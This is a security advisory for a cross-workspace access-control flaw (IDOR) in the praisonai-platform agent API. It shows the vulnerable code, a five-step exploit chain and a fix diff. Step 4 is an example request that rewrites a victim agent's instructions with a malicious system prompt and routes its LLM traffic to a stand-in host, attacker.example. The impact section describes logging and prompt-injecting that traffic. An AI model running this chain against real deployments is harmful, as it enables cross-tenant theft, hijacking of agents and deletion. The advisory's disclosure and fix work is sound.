PT-2026-47087 · Pypi · Praisonai-Platform

Published

2026-06-05

·

Updated

2026-06-05

·

CVE-2026-47419

CVSS v3.1

8.3

High

VectorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Summary

Type: Insecure Direct Object Reference. The agent CRUD endpoints (GET / PATCH / DELETE /workspaces/{workspace id}/agents/{agent id}) gate access on require workspace member(workspace id) only, then resolve agent id through AgentService.get(agent id) which is a primary-key lookup with no workspace constraint. A user who is a member of any workspace W1 can read, modify, or delete agents that belong to a different workspace W2 by guessing or harvesting an agent UUID and calling …/workspaces/W1/agents/<W2-agent-id>. File: src/praisonai-platform/praisonai platform/services/agent service.py, lines 53-112; route handlers at src/praisonai-platform/praisonai platform/api/routes/agents.py, lines 53-100. Root cause: the route extracts workspace id from the URL path and passes it to require workspace member for the membership check, but never threads it through to the service layer. AgentService.get calls session.get(Agent, agent id), which is SELECT * FROM agents WHERE id = :agent id with no AND workspace id = :workspace id. update and delete call self.get(agent id) first and then mutate the returned row, inheriting the same gap. The MemberService is the one place in this codebase that does this correctly: it uses (workspace id, user id) as a composite key. The agent service simply forgot the second predicate, which is the textbook GHSA pattern for FastAPI services that treat routing parameters as decorative rather than authoritative.

Affected Code

File 1: src/praisonai-platform/praisonai platform/services/agent service.py, lines 53-55 and 105-112.
class AgentService:
  ...

  async def get(self, agent id: str) -> Optional[Agent]:
    """Get agent by ID."""
    return await self. session.get(Agent, agent id)      # <-- BUG: no workspace id predicate

  async def update(
    self,
    agent id: str,
    name: Optional[str] = None,
    ...
  ) -> Optional[Agent]:
    agent = await self.get(agent id)              # <-- inherits the same gap
    if agent is None:
      return None
    ...
    return agent

  async def delete(self, agent id: str) -> bool:
    agent = await self.get(agent id)              # <-- inherits the same gap
    if agent is None:
      return False
    await self. session.delete(agent)
    await self. session.flush()
    return True
File 2: src/praisonai-platform/praisonai platform/api/routes/agents.py, lines 53-101.
@router.get("/{agent id}", response model=AgentResponse)
async def get agent(
  workspace id: str,
  agent id: str,
  user: AuthIdentity = Depends(require workspace member),     # only checks membership in workspace id
  session: AsyncSession = Depends(get db),
):
  svc = AgentService(session)
  agent = await svc.get(agent id)                 # <-- workspace id never passed; svc.get returns any agent in the DB
  if agent is None:
    raise HTTPException(status code=404, detail="Agent not found")
  return AgentResponse.model validate(agent)
The update agent (lines 67-87) and delete agent (lines 90-100) handlers exhibit the same pattern: they receive workspace id via path parameter, use it solely for the membership gate, then call svc.update(agent id, ...) / svc.delete(agent id) without re-checking which workspace the agent actually belongs to.
Why it's wrong: the workspace id segment in the route is treated as a UI hint (it gates "are you in some workspace W?") rather than an authoritative predicate (it should also gate "is the resource you are addressing actually inside W?"). A standard fix in FastAPI/SQLAlchemy services is to make the resource-lookup query include the workspace predicate and treat absence as 404, so that a foreign-workspace agent is indistinguishable from a non-existent one. The codebase already does this correctly in MemberService.get(workspace id, user id) and in *.list for workspace(workspace id, ...) — the gap is specific to the single-row get / update / delete paths.

Exploit Chain

  1. Attacker registers two accounts (or recruits a single workspace member) and creates two workspaces: W attacker (attacker is a member) and obtains a known agent id from W target (a workspace the attacker is NOT a member of). Agent IDs are uuid4 strings (DB column default), but they leak through several side channels: user-list endpoints when an agent is mentioned in an issue body, the activity feed (activity.py:log records entity id=agent.id), webhook payloads, error messages, exported issue dumps, or simply by enumeration if the deployment does not rotate IDs frequently. State: attacker holds a target agent UUID A T.
  2. Attacker authenticates and POSTs Authorization: Bearer <attacker jwt> to GET /workspaces/W attacker/agents/A T. require workspace member(W attacker, attacker) returns the attacker's identity (they are a member of W attacker). State: control flow enters get agent with workspace id=W attacker, agent id=A T.
  3. AgentService.get(A T) runs session.get(Agent, "A T"), which is SELECT * FROM agents WHERE id = 'A T' LIMIT 1. The query has no workspace id = 'W attacker' filter and returns the row — including its instructions, runtime config, name, status, owner id, etc — even though agent.workspace id == 'W target'. State: response body is the JSON-serialised target agent.
  4. Attacker repeats with PATCH /workspaces/W attacker/agents/A T and a body of {"instructions": "<malicious system prompt>", "runtime mode": "cloud", "runtime config": {"api base": "https://attacker.example/v1", "api key": "<exfil>"}}. update agent calls svc.update(A T, ...) which loads the target row and mutates the listed fields. State: the foreign workspace's agent now has attacker-chosen instructions and routes its LLM traffic through attacker.example.
  5. Attacker calls DELETE /workspaces/W attacker/agents/A T to wipe the target agent altogether, or repeats step 4 against every agent UUID they can harvest. State: target workspace's agent fleet is destroyed or backdoored.

Security Impact

Severity: sec-high. CVSS 8.1: network attack, low complexity, low privileges (any authenticated workspace member), no user interaction, scope unchanged (the auth context is the same component), high confidentiality (full agent record including instructions and runtime config), high integrity (arbitrary writes), low availability (DELETE wipes target agents). Attacker capability: with one workspace-member token plus a harvested or guessed agent UUID, an attacker can read the target agent's instructions (often a proprietary system prompt), runtime config (frequently contains LLM provider URLs and API keys when the deployment uses BYOK), owner id, and status; rewrite the same fields to redirect the agent's LLM traffic to an attacker-controlled endpoint (proxy-and-log of every prompt, prompt injection of every response); flip status to error to silently break a competitor workspace's agent fleet; or delete the agents outright. Preconditions: praisonai-platform is deployed multi-tenant (more than one workspace exists); the attacker has any membership token; the target agent's UUID is known or guessable (uuid4 randomness is large but UUIDs leak through activity feeds, webhook payloads, issue mentions, error messages, and operator screenshots). Differential: source-inspection-verified end-to-end. The asymmetry between AgentService.get(agent id) (no workspace check) and MemberService.get(workspace id, user id) (composite key check) is the smoking gun: the same author wrote both patterns, but only the member service is tenant-safe. With the suggested fix below applied, AgentService.get(workspace id, agent id) returns None when the agent belongs to a different workspace, the route handler returns 404, and the foreign workspace's data is indistinguishable from a missing record.

Suggested Fix

Make every single-row resource lookup take the workspace predicate. Treat foreign-workspace rows as 404, not 200, so the endpoint does not even confirm that the target ID exists.
--- a/src/praisonai-platform/praisonai platform/services/agent service.py
+++ b/src/praisonai-platform/praisonai platform/services/agent service.py
@@ -50,9 +50,12 @@ class AgentService:
     await self. session.flush()
     return agent

-  async def get(self, agent id: str) -> Optional[Agent]:
-    """Get agent by ID."""
-    return await self. session.get(Agent, agent id)
+  async def get(self, workspace id: str, agent id: str) -> Optional[Agent]:
+    """Get agent by ID, scoped to a workspace."""
+    stmt = select(Agent).where(
+      Agent.id == agent id, Agent.workspace id == workspace id
+    )
+    return (await self. session.execute(stmt)).scalar one or none()

   async def list for workspace(
     self,
@@ -71,6 +74,7 @@ class AgentService:

   async def update(
     self,
+    workspace id: str,
     agent id: str,
     name: Optional[str] = None,
     ...
   ) -> Optional[Agent]:
-    agent = await self.get(agent id)
+    agent = await self.get(workspace id, agent id)
     if agent is None:
       return None
     ...

-  async def delete(self, agent id: str) -> bool:
+  async def delete(self, workspace id: str, agent id: str) -> bool:
-    agent = await self.get(agent id)
+    agent = await self.get(workspace id, agent id)
     if agent is None:
       return False
The route handlers in routes/agents.py then need to pass workspace id into every svc.get/update/delete call. Repeat the pattern for IssueService, ProjectService, CommentService, and LabelService, which exhibit the same single-key lookup; those should be filed and fixed as separate advisories so each gets its own CVE.

Fix

IDOR

Weakness Enumeration

CWE-639

Related Identifiers

CVE-2026-47419
GHSA-7P8G-6C6G-H9W7

Affected Products

Praisonai-Platform